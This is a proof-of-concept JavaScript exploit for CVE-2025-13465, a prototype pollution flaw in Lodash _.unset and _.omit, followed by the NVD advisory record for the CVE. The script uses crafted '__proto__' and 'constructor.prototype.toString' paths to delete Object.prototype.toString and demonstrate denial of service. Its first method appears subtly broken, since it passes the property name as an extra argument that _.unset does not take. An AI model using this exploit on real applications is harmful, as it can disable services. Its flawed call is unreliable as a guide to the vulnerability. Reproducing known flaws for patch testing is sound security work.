CVE-2025-13465

// CVE-2025-13465 PoC - Prototype Pollution in Lodash _.unset and _.omit // Affected versions: 4.0.0 to 4.17.22 const _ = require('lodash'); console.log('[*] CVE-2025-13465 Prototype Pollution PoC'); console.log('[*] Target: Lodash <= 4.17.22\n'); // Check if toString exists before attack console.log('[1] Checking Object.prototype.toString before attack...'); console.log(' typeof Object.prototype.toString:', typeof Object.prototype.toString); // Method 1: Using _.unset with '__proto__' path console.log('\n[2] Exploiting _.unset with crafted path...'); const unsetResult = _.unset({}, '__proto__', 'toString'); console.log(' _.unset result:', unsetResult); console.log(' Object.prototype.toString deleted:', Object.prototype.toString === undefined); // Verify the attack effect console.log('\n[3] Verifying attack effect...'); try { const testObj = {name: 'test'}; testObj.toString(); console.log(' [UNEXPECTED] toString still exists'); } catch (e) { console.log(' [SUCCESS] toString was deleted, error:', e.message); } // Method 2: Using _.omit with nested constructor path console.log('\n[4] Exploiting _.omit with constructor path...'); const maliciousPath = 'constructor.prototype.toString'; const target = {key: 'value'}; const result = _.omit(target, [maliciousPath]); console.log(' _.omit result:', result); // Demonstrate denial of service impact console.log('\n[5] Demonstrating DoS impact...'); const data = {items: [1, 2, 3]}; try { console.log(' Before: data.toString():', data.toString()); } catch (e) { console.log(' [VULNERABLE] Cannot call toString():', e.message); } console.log('\n[*] PoC completed. Target is vulnerable if toString was deleted.'); console.log('[*] Recommendation: Upgrade to Lodash >= 4.17.23');

{"cve": {"id": "CVE-2025-13465", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-01-21T20:16:05.250", "lastModified": "2026-02-17T17:10:07.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23"}, {"lang": "es", "value": "Las versiones de Lodash 4.0.0 a 4.17.22 son vulnerables a la contaminación de prototipos en las funciones _.unset y _.omit. Un atacante puede pasar rutas manipuladas que hacen que Lodash elimine métodos de prototipos globales.\n\nEl problema permite la eliminación de propiedades, pero no permite sobrescribir su comportamiento original.\n\nEste problema está parcheado en 4.17.23"}], "metrics": {"cvssMetricV40": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.17.23", "matchCriteriaId": "0F9E287B-784B-472D-9FA2-1469E4C8A810"}]}]}], "references": [{"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}]}}